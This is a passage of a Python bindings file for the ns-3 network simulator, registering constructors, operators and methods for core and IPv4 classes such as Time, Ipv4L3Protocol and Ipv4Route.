    cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True, is_virtual=True)
    # static ns3::TypeId GetTypeId()
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    # bool IsEnabled() const
    cls.add_method('IsEnabled', 'bool', [], is_const=True)
    # void Print(std::ostream & os) const  [virtual]
    cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True, is_virtual=True)
    # void Serialize(ns3::TagBuffer i) const  [virtual]
    cls.add_method('Serialize', 'void', [param('ns3::TagBuffer', 'i')], is_const=True, is_virtual=True)
    return
def register_Ns3Time_methods(root_module, cls):
    """Register bindings for ns3::Time (nstime.h, module 'core')."""
    # Binary arithmetic, comparison, in-place and output-stream operators.
    cls.add_binary_numeric_operator('+', root_module['ns3::Time'], root_module['ns3::Time'], param('ns3::Time const &', 'right'))
    cls.add_binary_numeric_operator('-', root_module['ns3::Time'], root_module['ns3::Time'], param('ns3::Time const &', 'right'))
    cls.add_binary_comparison_operator('<')
    cls.add_binary_comparison_operator('>')
    cls.add_binary_comparison_operator('!=')
    cls.add_inplace_numeric_operator('+=', param('ns3::Time const &', 'right'))
    cls.add_inplace_numeric_operator('-=', param('ns3::Time const &', 'right'))
    cls.add_output_stream_operator()
    cls.add_binary_comparison_operator('<=')
    cls.add_binary_comparison_operator('==')
    cls.add_binary_comparison_operator('>=')
    # Constructors: default, copy, one per numeric type, string, int64x64_t.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::Time const &', 'o')])
    cls.add_constructor([param('double', 'v')])
    cls.add_constructor([param('int', 'v')])
    cls.add_constructor([param('long int', 'v')])
    cls.add_constructor([param('long long int', 'v')])
    cls.add_constructor([param('unsigned int', 'v')])
    cls.add_constructor([param('long unsigned int', 'v')])
    cls.add_constructor([param('long long unsigned int', 'v')])
    cls.add_constructor([param('std::string const &', 's')])
    cls.add_constructor([param('ns3::int64x64_t const &', 'value')])
    # int Compare(ns3::Time const & o) const
    cls.add_method('Compare', 'int', [param('ns3::Time const &', 'o')], is_const=True)
    # Static factory conversions from int64x64_t / double / integer.
    cls.add_method('From', 'ns3::Time', [param('ns3::int64x64_t const &', 'from'), param('ns3::Time::Unit', 'timeUnit')], is_static=True)
    cls.add_method('From', 'ns3::Time', [param('ns3::int64x64_t const &', 'value')], is_static=True)
    cls.add_method('FromDouble', 'ns3::Time', [param('double', 'value'), param('ns3::Time::Unit', 'timeUnit')], is_static=True)
    cls.add_method('FromInteger', 'ns3::Time', [param('uint64_t', 'value'), param('ns3::Time::Unit', 'timeUnit')], is_static=True)
    # Const accessors returning the time in various representations.
    cls.add_method('GetDouble', 'double', [], is_const=True)
    cls.add_method('GetFemtoSeconds', 'int64_t', [], is_const=True)
    cls.add_method('GetInteger', 'int64_t', [], is_const=True)
    cls.add_method('GetMicroSeconds', 'int64_t', [], is_const=True)
    cls.add_method('GetMilliSeconds', 'int64_t', [], is_const=True)
    cls.add_method('GetNanoSeconds', 'int64_t', [], is_const=True)
    cls.add_method('GetPicoSeconds', 'int64_t', [], is_const=True)
    # static ns3::Time::Unit GetResolution()
    cls.add_method('GetResolution', 'ns3::Time::Unit', [], is_static=True)
    cls.add_method('GetSeconds', 'double', [], is_const=True)
    cls.add_method('GetTimeStep', 'int64_t', [], is_const=True)
    # Sign / zero predicates.
    cls.add_method('IsNegative', 'bool', [], is_const=True)
    cls.add_method('IsPositive', 'bool', [], is_const=True)
    cls.add_method('IsStrictlyNegative', 'bool', [], is_const=True)
    cls.add_method('IsStrictlyPositive', 'bool', [], is_const=True)
    cls.add_method('IsZero', 'bool', [], is_const=True)
    # static void SetResolution(ns3::Time::Unit resolution)
    cls.add_method('SetResolution', 'void', [param('ns3::Time::Unit', 'resolution')], is_static=True)
    # Conversions to a given time unit.
    cls.add_method('To', 'ns3::int64x64_t', [param('ns3::Time::Unit', 'timeUnit')], is_const=True)
    cls.add_method('ToDouble', 'double', [param('ns3::Time::Unit', 'timeUnit')], is_const=True)
    cls.add_method('ToInteger', 'int64_t', [param('ns3::Time::Unit', 'timeUnit')], is_const=True)
    return
def register_Ns3TraceSourceAccessor_methods(root_module, cls):
    """Register ns3::TraceSourceAccessor bindings (trace-source-accessor.h, module 'core')."""
    # Copy constructor first, then the default constructor.
    cls.add_constructor([param('ns3::TraceSourceAccessor const &', 'arg0')])
    cls.add_constructor([])

    def add_connect_method(method_name, takes_context):
        # Each (dis)connect member is a pure virtual const method that takes a
        # non-owning ObjectBase pointer and a CallbackBase; the context-taking
        # variants insert a std::string argument between the two.
        args = [param('ns3::ObjectBase *', 'obj', transfer_ownership=False)]
        if takes_context:
            args.append(param('std::string', 'context'))
        args.append(param('ns3::CallbackBase const &', 'cb'))
        cls.add_method(method_name, 'bool', args,
                       is_pure_virtual=True, is_const=True, is_virtual=True)

    add_connect_method('Connect', True)
    add_connect_method('ConnectWithoutContext', False)
    add_connect_method('Disconnect', True)
    add_connect_method('DisconnectWithoutContext', False)
    return
def register_Ns3Trailer_methods(root_module, cls):
    """Register ns3::Trailer bindings (trailer.h, module 'network')."""
    # operator<< support, then the default and copy constructors.
    cls.add_output_stream_operator()
    cls.add_constructor([])
    cls.add_constructor([param('ns3::Trailer const &', 'arg0')])
    # Pure virtual serialization interface plus the static GetTypeId.
    cls.add_method('Deserialize', 'uint32_t',
                   [param('ns3::Buffer::Iterator', 'end')],
                   is_pure_virtual=True, is_virtual=True)
    cls.add_method('GetSerializedSize', 'uint32_t', [],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    cls.add_method('Print', 'void',
                   [param('std::ostream &', 'os')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    cls.add_method('Serialize', 'void',
                   [param('ns3::Buffer::Iterator', 'start')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    return
def register_Ns3AttributeAccessor_methods(root_module, cls):
    """Register ns3::AttributeAccessor bindings (attribute.h, module 'core')."""
    cls.add_constructor([param('ns3::AttributeAccessor const &', 'arg0')])
    cls.add_constructor([])
    # Every member below is a pure virtual const method returning bool.
    pure_const = dict(is_pure_virtual=True, is_const=True, is_virtual=True)
    cls.add_method('Get', 'bool',
                   [param('ns3::ObjectBase const *', 'object'),
                    param('ns3::AttributeValue &', 'attribute')],
                   **pure_const)
    cls.add_method('HasGetter', 'bool', [], **pure_const)
    cls.add_method('HasSetter', 'bool', [], **pure_const)
    cls.add_method('Set', 'bool',
                   [param('ns3::ObjectBase *', 'object', transfer_ownership=False),
                    param('ns3::AttributeValue const &', 'value')],
                   **pure_const)
    return
def register_Ns3AttributeChecker_methods(root_module, cls):
    """Register ns3::AttributeChecker bindings (attribute.h, module 'core')."""
    cls.add_constructor([param('ns3::AttributeChecker const &', 'arg0')])
    cls.add_constructor([])
    pure_const = dict(is_pure_virtual=True, is_const=True, is_virtual=True)
    cls.add_method('Check', 'bool',
                   [param('ns3::AttributeValue const &', 'value')],
                   **pure_const)
    cls.add_method('Copy', 'bool',
                   [param('ns3::AttributeValue const &', 'source'),
                    param('ns3::AttributeValue &', 'destination')],
                   **pure_const)
    cls.add_method('Create', 'ns3::Ptr< ns3::AttributeValue >', [], **pure_const)
    # CreateValidValue is the one non-pure member: const only, not virtual here.
    cls.add_method('CreateValidValue', 'ns3::Ptr< ns3::AttributeValue >',
                   [param('ns3::AttributeValue const &', 'value')],
                   is_const=True)
    cls.add_method('GetUnderlyingTypeInformation', 'std::string', [], **pure_const)
    cls.add_method('GetValueTypeName', 'std::string', [], **pure_const)
    cls.add_method('HasUnderlyingTypeInformation', 'bool', [], **pure_const)
    return
def register_Ns3AttributeValue_methods(root_module, cls):
    """Register ns3::AttributeValue bindings (attribute.h, module 'core')."""
    cls.add_constructor([param('ns3::AttributeValue const &', 'arg0')])
    cls.add_constructor([])
    # The checker argument type is shared by both string-conversion methods.
    checker_type = 'ns3::Ptr< ns3::AttributeChecker const >'
    cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    cls.add_method('DeserializeFromString', 'bool',
                   [param('std::string', 'value'), param(checker_type, 'checker')],
                   is_pure_virtual=True, is_virtual=True)
    cls.add_method('SerializeToString', 'std::string',
                   [param(checker_type, 'checker')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    return
def register_Ns3CallbackChecker_methods(root_module, cls):
    """Register ns3::CallbackChecker bindings (callback.h, module 'core').

    Only the default and copy constructors are exposed.
    """
    for ctor_args in ([], [param('ns3::CallbackChecker const &', 'arg0')]):
        cls.add_constructor(ctor_args)
    return
def register_Ns3CallbackImplBase_methods(root_module, cls):
    """Register ns3::CallbackImplBase bindings (callback.h, module 'core')."""
    cls.add_constructor([])
    cls.add_constructor([param('ns3::CallbackImplBase const &', 'arg0')])
    # IsEqual is a pure virtual const comparison against another callback impl.
    cls.add_method('IsEqual', 'bool',
                   [param('ns3::Ptr< ns3::CallbackImplBase const >', 'other')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    return
def register_Ns3CallbackValue_methods(root_module, cls):
    """Register ns3::CallbackValue bindings (callback.h, module 'core')."""
    # Copy constructor, default constructor, then construction from a CallbackBase.
    cls.add_constructor([param('ns3::CallbackValue const &', 'arg0')])
    cls.add_constructor([])
    cls.add_constructor([param('ns3::CallbackBase const &', 'base')])
    # Virtual AttributeValue interface implementations (const/virtual, not pure).
    cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [],
                   is_const=True, is_virtual=True)
    cls.add_method('DeserializeFromString', 'bool',
                   [param('std::string', 'value'),
                    param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
                   is_virtual=True)
    cls.add_method('SerializeToString', 'std::string',
                   [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
                   is_const=True, is_virtual=True)
    # Plain setter taking the wrapped CallbackBase by value.
    cls.add_method('Set', 'void', [param('ns3::CallbackBase', 'base')])
    return
def register_Ns3Channel_methods(root_module, cls):
    """Register ns3::Channel bindings (channel.h, module 'network')."""
    cls.add_constructor([param('ns3::Channel const &', 'arg0')])
    cls.add_constructor([])
    # GetDevice and GetNDevices are pure virtual const; GetId is const only.
    cls.add_method('GetDevice', 'ns3::Ptr< ns3::NetDevice >',
                   [param('uint32_t', 'i')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    cls.add_method('GetId', 'uint32_t', [], is_const=True)
    cls.add_method('GetNDevices', 'uint32_t', [],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    return
def register_Ns3EmptyAttributeValue_methods(root_module, cls):
    """Register ns3::EmptyAttributeValue bindings (attribute.h, module 'core')."""
    cls.add_constructor([param('ns3::EmptyAttributeValue const &', 'arg0')])
    cls.add_constructor([])
    # The AttributeValue interface is implemented with private visibility here.
    cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [],
                   is_const=True, visibility='private', is_virtual=True)
    cls.add_method('DeserializeFromString', 'bool',
                   [param('std::string', 'value'),
                    param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
                   visibility='private', is_virtual=True)
    cls.add_method('SerializeToString', 'std::string',
                   [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
                   is_const=True, visibility='private', is_virtual=True)
    return
def register_Ns3EventImpl_methods(root_module, cls):
    """Register ns3::EventImpl bindings (event-impl.h, module 'core')."""
    cls.add_constructor([param('ns3::EventImpl const &', 'arg0')])
    cls.add_constructor([])
    # Public non-virtual members.
    cls.add_method('Cancel', 'void', [])
    cls.add_method('Invoke', 'void', [])
    cls.add_method('IsCancelled', 'bool', [])
    # Notify is the protected pure virtual hook.
    cls.add_method('Notify', 'void', [],
                   is_pure_virtual=True, visibility='protected', is_virtual=True)
    return
def register_Ns3Ipv4_methods(root_module, cls):
    """Register bindings for the abstract ns3::Ipv4 base class (ipv4.h, module 'internet')."""
    # Copy constructor first, then the default constructor.
    cls.add_constructor([param('ns3::Ipv4 const &', 'arg0')])
    cls.add_constructor([])
    # Keyword-argument shorthands for the two flag combinations that recur below.
    pv = dict(is_pure_virtual=True, is_virtual=True)
    pcv = dict(is_pure_virtual=True, is_const=True, is_virtual=True)
    # (name, return type, parameters, flags) for every public method, in the
    # same order in which the original calls were emitted.
    public_methods = [
        ('AddAddress', 'bool',
         [param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')], pv),
        ('AddInterface', 'uint32_t',
         [param('ns3::Ptr< ns3::NetDevice >', 'device')], pv),
        ('GetAddress', 'ns3::Ipv4InterfaceAddress',
         [param('uint32_t', 'interface'), param('uint32_t', 'addressIndex')], pcv),
        ('GetInterfaceForAddress', 'int32_t',
         [param('ns3::Ipv4Address', 'address')], pcv),
        ('GetInterfaceForDevice', 'int32_t',
         [param('ns3::Ptr< ns3::NetDevice const >', 'device')], pcv),
        ('GetInterfaceForPrefix', 'int32_t',
         [param('ns3::Ipv4Address', 'address'), param('ns3::Ipv4Mask', 'mask')], pcv),
        ('GetMetric', 'uint16_t', [param('uint32_t', 'interface')], pcv),
        ('GetMtu', 'uint16_t', [param('uint32_t', 'interface')], pcv),
        ('GetNAddresses', 'uint32_t', [param('uint32_t', 'interface')], pcv),
        ('GetNInterfaces', 'uint32_t', [], pcv),
        ('GetNetDevice', 'ns3::Ptr< ns3::NetDevice >',
         [param('uint32_t', 'interface')], pv),
        ('GetRoutingProtocol', 'ns3::Ptr< ns3::Ipv4RoutingProtocol >', [], pcv),
        ('GetTypeId', 'ns3::TypeId', [], dict(is_static=True)),
        ('Insert', 'void',
         [param('ns3::Ptr< ns3::Ipv4L4Protocol >', 'protocol')], pv),
        ('IsDestinationAddress', 'bool',
         [param('ns3::Ipv4Address', 'address'), param('uint32_t', 'iif')], pcv),
        ('IsForwarding', 'bool', [param('uint32_t', 'interface')], pcv),
        ('IsUp', 'bool', [param('uint32_t', 'interface')], pcv),
        ('RemoveAddress', 'bool',
         [param('uint32_t', 'interface'), param('uint32_t', 'addressIndex')], pv),
        ('SelectSourceAddress', 'ns3::Ipv4Address',
         [param('ns3::Ptr< ns3::NetDevice const >', 'device'),
          param('ns3::Ipv4Address', 'dst'),
          param('ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e', 'scope')], pv),
        ('Send', 'void',
         [param('ns3::Ptr< ns3::Packet >', 'packet'),
          param('ns3::Ipv4Address', 'source'),
          param('ns3::Ipv4Address', 'destination'),
          param('uint8_t', 'protocol'),
          param('ns3::Ptr< ns3::Ipv4Route >', 'route')], pv),
        ('SetDown', 'void', [param('uint32_t', 'interface')], pv),
        ('SetForwarding', 'void',
         [param('uint32_t', 'interface'), param('bool', 'val')], pv),
        ('SetMetric', 'void',
         [param('uint32_t', 'interface'), param('uint16_t', 'metric')], pv),
        ('SetRoutingProtocol', 'void',
         [param('ns3::Ptr< ns3::Ipv4RoutingProtocol >', 'routingProtocol')], pv),
        ('SetUp', 'void', [param('uint32_t', 'interface')], pv),
    ]
    for name, retval, params, flags in public_methods:
        cls.add_method(name, retval, params, **flags)
    # Static IF_ANY constant.
    cls.add_static_attribute('IF_ANY', 'uint32_t const', is_const=True)
    # Private pure virtual get/set hooks.
    private_methods = [
        ('GetIpForward', 'bool', [],
         dict(is_pure_virtual=True, is_const=True, visibility='private', is_virtual=True)),
        ('GetWeakEsModel', 'bool', [],
         dict(is_pure_virtual=True, is_const=True, visibility='private', is_virtual=True)),
        ('SetIpForward', 'void', [param('bool', 'forward')],
         dict(is_pure_virtual=True, visibility='private', is_virtual=True)),
        ('SetWeakEsModel', 'void', [param('bool', 'model')],
         dict(is_pure_virtual=True, visibility='private', is_virtual=True)),
    ]
    for name, retval, params, flags in private_methods:
        cls.add_method(name, retval, params, **flags)
    return
def register_Ns3Ipv4AddressChecker_methods(root_module, cls):
    """Register ns3::Ipv4AddressChecker bindings (ipv4-address.h, module 'network').

    Only the default and copy constructors are exposed.
    """
    for ctor_args in ([], [param('ns3::Ipv4AddressChecker const &', 'arg0')]):
        cls.add_constructor(ctor_args)
    return
def register_Ns3Ipv4AddressValue_methods(root_module, cls):
    """Register ns3::Ipv4AddressValue bindings (ipv4-address.h, module 'network')."""
    # Default, copy, and value-wrapping constructors.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::Ipv4AddressValue const &', 'arg0')])
    cls.add_constructor([param('ns3::Ipv4Address const &', 'value')])
    # Virtual AttributeValue interface plus the typed Get/Set accessors.
    cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [],
                   is_const=True, is_virtual=True)
    cls.add_method('DeserializeFromString', 'bool',
                   [param('std::string', 'value'),
                    param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
                   is_virtual=True)
    cls.add_method('Get', 'ns3::Ipv4Address', [], is_const=True)
    cls.add_method('SerializeToString', 'std::string',
                   [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
                   is_const=True, is_virtual=True)
    cls.add_method('Set', 'void', [param('ns3::Ipv4Address const &', 'value')])
    return
def register_Ns3Ipv4L3Protocol_methods(root_module, cls):
    """Register bindings for ns3::Ipv4L3Protocol (ipv4-l3-protocol.h, module 'internet')."""
    cls.add_constructor([])
    # Keyword-argument shorthands for the flag combinations that recur below.
    virt = dict(is_virtual=True)
    const = dict(is_const=True)
    const_virt = dict(is_const=True, is_virtual=True)
    plain = {}
    # (name, return type, parameters, flags) for every public method, in the
    # same order in which the original calls were emitted.
    public_methods = [
        ('AddAddress', 'bool',
         [param('uint32_t', 'i'), param('ns3::Ipv4InterfaceAddress', 'address')], virt),
        ('AddInterface', 'uint32_t',
         [param('ns3::Ptr< ns3::NetDevice >', 'device')], virt),
        ('CreateRawSocket', 'ns3::Ptr< ns3::Socket >', [], plain),
        ('DeleteRawSocket', 'void',
         [param('ns3::Ptr< ns3::Socket >', 'socket')], plain),
        ('GetAddress', 'ns3::Ipv4InterfaceAddress',
         [param('uint32_t', 'interfaceIndex'), param('uint32_t', 'addressIndex')], const_virt),
        ('GetInterface', 'ns3::Ptr< ns3::Ipv4Interface >',
         [param('uint32_t', 'i')], const),
        ('GetInterfaceForAddress', 'int32_t',
         [param('ns3::Ipv4Address', 'addr')], const_virt),
        ('GetInterfaceForDevice', 'int32_t',
         [param('ns3::Ptr< ns3::NetDevice const >', 'device')], const_virt),
        ('GetInterfaceForPrefix', 'int32_t',
         [param('ns3::Ipv4Address', 'addr'), param('ns3::Ipv4Mask', 'mask')], const_virt),
        ('GetMetric', 'uint16_t', [param('uint32_t', 'i')], const_virt),
        ('GetMtu', 'uint16_t', [param('uint32_t', 'i')], const_virt),
        ('GetNAddresses', 'uint32_t', [param('uint32_t', 'interface')], const_virt),
        ('GetNInterfaces', 'uint32_t', [], const_virt),
        ('GetNetDevice', 'ns3::Ptr< ns3::NetDevice >',
         [param('uint32_t', 'i')], virt),
        ('GetProtocol', 'ns3::Ptr< ns3::Ipv4L4Protocol >',
         [param('int', 'protocolNumber')], const),
        ('GetRoutingProtocol', 'ns3::Ptr< ns3::Ipv4RoutingProtocol >', [], const_virt),
        ('GetTypeId', 'ns3::TypeId', [], dict(is_static=True)),
        ('Insert', 'void',
         [param('ns3::Ptr< ns3::Ipv4L4Protocol >', 'protocol')], virt),
        ('IsDestinationAddress', 'bool',
         [param('ns3::Ipv4Address', 'address'), param('uint32_t', 'iif')], const_virt),
        ('IsForwarding', 'bool', [param('uint32_t', 'i')], const_virt),
        ('IsUp', 'bool', [param('uint32_t', 'i')], const_virt),
        ('Receive', 'void',
         [param('ns3::Ptr< ns3::NetDevice >', 'device'),
          param('ns3::Ptr< ns3::Packet const >', 'p'),
          param('uint16_t', 'protocol'),
          param('ns3::Address const &', 'from'),
          param('ns3::Address const &', 'to'),
          param('ns3::NetDevice::PacketType', 'packetType')], plain),
        ('Remove', 'void',
         [param('ns3::Ptr< ns3::Ipv4L4Protocol >', 'protocol')], plain),
        ('RemoveAddress', 'bool',
         [param('uint32_t', 'interfaceIndex'), param('uint32_t', 'addressIndex')], virt),
        ('SelectSourceAddress', 'ns3::Ipv4Address',
         [param('ns3::Ptr< ns3::NetDevice const >', 'device'),
          param('ns3::Ipv4Address', 'dst'),
          param('ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e', 'scope')], virt),
        ('Send', 'void',
         [param('ns3::Ptr< ns3::Packet >', 'packet'),
          param('ns3::Ipv4Address', 'source'),
          param('ns3::Ipv4Address', 'destination'),
          param('uint8_t', 'protocol'),
          param('ns3::Ptr< ns3::Ipv4Route >', 'route')], virt),
        ('SendWithHeader', 'void',
         [param('ns3::Ptr< ns3::Packet >', 'packet'),
          param('ns3::Ipv4Header', 'ipHeader'),
          param('ns3::Ptr< ns3::Ipv4Route >', 'route')], plain),
        ('SetDefaultTtl', 'void', [param('uint8_t', 'ttl')], plain),
        ('SetDown', 'void', [param('uint32_t', 'i')], virt),
        ('SetForwarding', 'void',
         [param('uint32_t', 'i'), param('bool', 'val')], virt),
        ('SetMetric', 'void',
         [param('uint32_t', 'i'), param('uint16_t', 'metric')], virt),
        ('SetNode', 'void', [param('ns3::Ptr< ns3::Node >', 'node')], plain),
        ('SetRoutingProtocol', 'void',
         [param('ns3::Ptr< ns3::Ipv4RoutingProtocol >', 'routingProtocol')], virt),
        ('SetUp', 'void', [param('uint32_t', 'i')], virt),
    ]
    for name, retval, params, flags in public_methods:
        cls.add_method(name, retval, params, **flags)
    # Static PROT_NUMBER constant.
    cls.add_static_attribute('PROT_NUMBER', 'uint16_t const', is_const=True)
    # Protected overrides and private virtual get/set hooks.
    non_public_methods = [
        ('DoDispose', 'void', [],
         dict(visibility='protected', is_virtual=True)),
        ('NotifyNewAggregate', 'void', [],
         dict(visibility='protected', is_virtual=True)),
        ('GetIpForward', 'bool', [],
         dict(is_const=True, visibility='private', is_virtual=True)),
        ('GetWeakEsModel', 'bool', [],
         dict(is_const=True, visibility='private', is_virtual=True)),
        ('SetIpForward', 'void', [param('bool', 'forward')],
         dict(visibility='private', is_virtual=True)),
        ('SetWeakEsModel', 'void', [param('bool', 'model')],
         dict(visibility='private', is_virtual=True)),
    ]
    for name, retval, params, flags in non_public_methods:
        cls.add_method(name, retval, params, **flags)
    return
def register_Ns3Ipv4L4Protocol_methods(root_module, cls):
    """Register the wrapped API of ns3::Ipv4L4Protocol (ipv4-l4-protocol.h, module 'internet')."""
    # Default and copy constructors.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::Ipv4L4Protocol const &', 'arg0')])
    # GetDownTarget() const: pure-virtual accessor for the down-target callback.
    cls.add_method('GetDownTarget', 'ns3::Callback< void, ns3::Ptr< ns3::Packet >, ns3::Ipv4Address, ns3::Ipv4Address, unsigned char, ns3::Ptr< ns3::Ipv4Route >, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    # GetProtocolNumber() const: pure-virtual protocol number accessor.
    cls.add_method('GetProtocolNumber', 'int', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    # GetTypeId(): static TypeId accessor.
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    # Receive(): pure-virtual packet delivery hook.
    cls.add_method('Receive', 'ns3::Ipv4L4Protocol::RxStatus', [param('ns3::Ptr< ns3::Packet >', 'p'), param('ns3::Ipv4Header const &', 'header'), param('ns3::Ptr< ns3::Ipv4Interface >', 'incomingInterface')], is_pure_virtual=True, is_virtual=True)
    # ReceiveIcmp(): virtual ICMP notification hook.
    cls.add_method('ReceiveIcmp', 'void', [param('ns3::Ipv4Address', 'icmpSource'), param('uint8_t', 'icmpTtl'), param('uint8_t', 'icmpType'), param('uint8_t', 'icmpCode'), param('uint32_t', 'icmpInfo'), param('ns3::Ipv4Address', 'payloadSource'), param('ns3::Ipv4Address', 'payloadDestination'), param('uint8_t const *', 'payload')], is_virtual=True)
    # SetDownTarget(): pure-virtual setter for the down-target callback.
    cls.add_method('SetDownTarget', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::Packet >, ns3::Ipv4Address, ns3::Ipv4Address, unsigned char, ns3::Ptr< ns3::Ipv4Route >, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')], is_pure_virtual=True, is_virtual=True)
    return
def register_Ns3Ipv4MaskChecker_methods(root_module, cls):
    """Register the wrapped API of ns3::Ipv4MaskChecker (ipv4-address.h, module 'network')."""
    # Default and copy constructors.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::Ipv4MaskChecker const &', 'arg0')])
    return
def register_Ns3Ipv4MaskValue_methods(root_module, cls):
    """Register the wrapped API of ns3::Ipv4MaskValue (ipv4-address.h, module 'network')."""
    # Constructors: default, copy, and from an ns3::Ipv4Mask value.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::Ipv4MaskValue const &', 'arg0')])
    cls.add_constructor([param('ns3::Ipv4Mask const &', 'value')])
    # AttributeValue interface: Copy / DeserializeFromString / SerializeToString.
    cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True)
    cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True)
    cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True)
    # Typed accessors for the held Ipv4Mask.
    cls.add_method('Get', 'ns3::Ipv4Mask', [], is_const=True)
    cls.add_method('Set', 'void', [param('ns3::Ipv4Mask const &', 'value')])
    return
def register_Ns3Ipv4MulticastRoute_methods(root_module, cls):
    """Register the wrapped API of ns3::Ipv4MulticastRoute (ipv4-route.h, module 'internet')."""
    # Copy and default constructors.
    cls.add_constructor([param('ns3::Ipv4MulticastRoute const &', 'arg0')])
    cls.add_constructor([])
    # Const accessors for group, origin, and parent interface.
    cls.add_method('GetGroup', 'ns3::Ipv4Address', [], is_const=True)
    cls.add_method('GetOrigin', 'ns3::Ipv4Address', [], is_const=True)
    cls.add_method('GetParent', 'uint32_t', [], is_const=True)
    # GetOutputTtl(oif) is marked deprecated upstream.
    cls.add_method('GetOutputTtl', 'uint32_t', [param('uint32_t', 'oif')], deprecated=True)
    # Full output-TTL map accessor.
    cls.add_method('GetOutputTtlMap', 'std::map< unsigned int, unsigned int >', [], is_const=True)
    # Mutators.
    cls.add_method('SetGroup', 'void', [param('ns3::Ipv4Address const', 'group')])
    cls.add_method('SetOrigin', 'void', [param('ns3::Ipv4Address const', 'origin')])
    cls.add_method('SetOutputTtl', 'void', [param('uint32_t', 'oif'), param('uint32_t', 'ttl')])
    cls.add_method('SetParent', 'void', [param('uint32_t', 'iif')])
    # Static class constants.
    cls.add_static_attribute('MAX_INTERFACES', 'uint32_t const', is_const=True)
    cls.add_static_attribute('MAX_TTL', 'uint32_t const', is_const=True)
    return
def register_Ns3Ipv4Route_methods(root_module, cls):
    """Register the wrapped API of ns3::Ipv4Route (ipv4-route.h, module 'internet')."""
    # operator<< support for printing routes.
    cls.add_output_stream_operator()
    # Copy and default constructors.
    cls.add_constructor([param('ns3::Ipv4Route const &', 'arg0')])
    cls.add_constructor([])
    # Const accessors.
    cls.add_method('GetDestination', 'ns3::Ipv4Address', [], is_const=True)
    cls.add_method('GetGateway', 'ns3::Ipv4Address', [], is_const=True)
    cls.add_method('GetOutputDevice', 'ns3::Ptr< ns3::NetDevice >', [], is_const=True)
    cls.add_method('GetSource', 'ns3::Ipv4Address', [], is_const=True)
    # Mutators.
    cls.add_method('SetDestination', 'void', [param('ns3::Ipv4Address', 'dest')])
    cls.add_method('SetGateway', 'void', [param('ns3::Ipv4Address', 'gw')])
    cls.add_method('SetOutputDevice', 'void', [param('ns3::Ptr< ns3::NetDevice >', 'outputDevice')])
    cls.add_method('SetSource', 'void', [param('ns3::Ipv4Address', 'src')])
    return
def register_Ns3Ipv4RoutingProtocol_methods(root_module, cls):
    """Register the wrapped API of ns3::Ipv4RoutingProtocol (ipv4-routing-protocol.h, module 'internet')."""
    # Default and copy constructors.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::Ipv4RoutingProtocol const &', 'arg0')])
    # GetTypeId(): static TypeId accessor.
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    # Pure-virtual interface/address notification hooks.
    cls.add_method('NotifyAddAddress', 'void', [param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')], is_pure_virtual=True, is_virtual=True)
    cls.add_method('NotifyInterfaceDown', 'void', [param('uint32_t', 'interface')], is_pure_virtual=True, is_virtual=True)
    cls.add_method('NotifyInterfaceUp', 'void', [param('uint32_t', 'interface')], is_pure_virtual=True, is_virtual=True)
    cls.add_method('NotifyRemoveAddress', 'void', [param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')], is_pure_virtual=True, is_virtual=True)
    # PrintRoutingTable(): pure-virtual const dump of the routing table.
    cls.add_method('PrintRoutingTable', 'void', [param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream')], is_pure_virtual=True, is_const=True, is_virtual=True)
    # RouteInput(): pure-virtual forwarding decision with unicast/multicast/local/error callbacks.
